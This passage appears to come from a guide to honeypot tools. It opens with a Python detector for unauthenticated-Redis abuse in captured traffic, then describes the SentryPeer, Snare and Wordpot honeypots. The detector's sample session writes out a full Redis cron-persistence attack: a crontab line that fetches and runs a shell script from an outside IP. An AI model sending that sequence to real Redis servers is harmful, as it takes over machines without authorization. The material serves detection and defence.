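        out.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(out)


def parse_commands(stream: bytes) -> list:
    """Split a captured client->server stream into argv lists (RESP arrays or inline commands)."""
    commands, pos = [], 0
    while pos < len(stream):
        if stream[pos:pos + 1] == b"*":
            end = stream.index(b"\r\n", pos)
            count, pos = int(stream[pos + 1:end]), end + 2
            argv = []
            for _ in range(count):
                if stream[pos:pos + 1] != b"$":
                    raise ValueError(f"expected bulk string at offset {pos}")
                end = stream.index(b"\r\n", pos)
                size, pos = int(stream[pos + 1:end]), end + 2
                argv.append(stream[pos:pos + size].decode("utf-8", "replace"))
                pos += size + 2
            commands.append(argv)
        else:                                        # inline command: plain words ending in CRLF
            end = stream.find(b"\r\n", pos)
            end = len(stream) if end == -1 else end
            line = stream[pos:end].decode("utf-8", "replace")
            pos = end + 2
            if line.strip():
                commands.append(line.split())
    return commands


def detect_abuse(commands) -> list:
    """Flag the classic unauthenticated-Redis abuse sequences; returns human-readable findings."""
    findings, target_dir, target_file = [], None, "dump.rdb"
    for argv in commands:
        if not argv:
            continue
        verb = argv[0].upper()
        if verb == "CONFIG" and len(argv) >= 4 and argv[1].upper() == "SET":
            if argv[2].lower() == "dir":
                target_dir = argv[3]                 # where the next SAVE will write
            elif argv[2].lower() == "dbfilename":
                target_file = argv[3]                # what it will be called
        elif verb == "SET" and len(argv) >= 3 and "\n" in argv[2]:
            findings.append(f"multi-line value stored under key {argv[1]!r} (crontab/authorized_keys style payload)")
        elif verb in ("SAVE", "BGSAVE") and target_dir and target_dir.startswith(SENSITIVE_DIRS):
            findings.append(f"RDB dump written to {target_dir}/{target_file} via {verb}")
        elif verb in ("SLAVEOF", "REPLICAOF") and len(argv) >= 3 and argv[1].upper() != "NO":
            findings.append(f"instance pointed at rogue master {argv[1]}:{argv[2]} (module loading via replication)")
        elif verb == "MODULE" and len(argv) >= 3 and argv[1].upper() == "LOAD":
            findings.append(f"MODULE LOAD {argv[2]}")
    return findings


# Constructed session: the cron-write persistence sequence as seen on the wire.
SESSION = b"".join([
    b"PING\r\n",                                     # inline form many scanners start with
    encode_command("INFO"),
    encode_command("CONFIG", "SET", "dir", "/var/spool/cron"),
    encode_command("CONFIG", "SET", "dbfilename", "root"),
    encode_command("SET", "x", "\n\n*/1 * * * * curl -fsSL http://198.51.100.7/i.sh | sh\n\n"),
    encode_command("SAVE"),
])

if __name__ == "__main__":
    cmds = parse_commands(SESSION)
    for argv in cmds:
        print(argv)
    print(detect_abuse(cmds))
```

The RDB file written by SAVE is binary with the stored values embedded in it, which is why the payload is padded with newlines: cron skips the unparseable lines & runs the one valid entry. Blocking CONFIG (rename-command) & setting requirepass on real instances breaks this sequence at its first step.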

SentryPeer

SentryPeer® is a fraud-detection tool for SIP/VoIP. It lets bad actors try to make phone calls & saves the IP address they came from & the number they tried to call. Those details can then be used to raise notifications on the service provider's network, & the next time a user/customer tries to call a collected number, you can act in any way you see fit. In T-Pot it serves as a SIP honeypot: it listens on the SIP port (5060) & catches the toll-fraud scanners that probe for open PBXs & try to register or place calls through them.

https://github.com/SentryPeer/SentryPeer

Snare

Snare is a web application honeypot from the mushorg project, the successor to Glastopf. It is not a Windows, SSH or Telnet emulator. Snare clones an existing website & serves the copy over HTTP; every request it receives is handed to its companion service TANNER (https://github.com/mushorg/tanner), which analyzes the request, decides what kind of attack it is & tells Snare which response to send back.

Key features of Snare include:

  • Website Cloning: Snare comes with a cloner that mirrors a chosen site's pages, so the honeypot looks like a real, specific web application rather than a generic default page.

  • Request Analysis via TANNER: TANNER inspects each request for attack patterns such as SQL injection, local & remote file inclusion, cross-site scripting, command injection & PHP code injection, & selects an emulated response that makes the attack appear to succeed, which keeps automated tools & attackers engaged.

  • Logging & Monitoring: Every request is logged with its source, path, parameters & the attack type TANNER assigned, so the web scanning & exploitation attempts against a site can be analyzed in bulk.

  • Detection of Attacks: The honeypot surfaces web-application attack traffic, from vulnerability scanners enumerating common paths to exploitation attempts against specific web vulnerabilities.

  • Threat Intelligence Gathering: Deploying Snare shows which web vulnerabilities are being actively exploited & with what payloads, information that can be fed back into WAF rules & patch priorities for real web applications.

https://github.com/mushorg/snare

Wordpot

Wordpot is a honeypot that imitates a WordPress installation. It is built to attract & record the probes attackers use to fingerprint WordPress sites, which are the first step of almost every WordPress attack.

WordPress is one of the most popular content management systems (CMS) for websites & blogs. Because of its reach, & because most compromises come through vulnerable plugins & themes rather than WordPress core itself, WordPress sites are scanned continuously by attackers looking for an installation running a version or plugin with a known vulnerability.

Key features of Wordpot include:

  • Emulation of WordPress: Wordpot serves the pages & paths a scanner expects from WordPress (login page, readme, plugin & theme directories, common helper files such as timthumb), so it is picked up by tools scanning the internet for WordPress installations.

  • Fingerprinting Detection: Wordpot's particular strength is recognizing probes for specific plugins, themes & files; each such request tells you which vulnerable component the scanner is hoping to find.

  • Logging & Monitoring: Login attempts against wp-login.php & requests for plugin, theme & other fingerprinting paths are logged with their source. Wordpot does not host real plugins, so there are no real installations or uploads to observe; the value is in the request log.

  • Detection of Attacks: The logs show brute-force login attempts, enumeration of plugins & themes, & attempts to reach known-vulnerable files.

  • Threat Intelligence Gathering: Knowing which plugins & themes attackers are currently probing for is directly useful for prioritizing updates on real WordPress sites.

https://github.com/gbrindisi/wordpot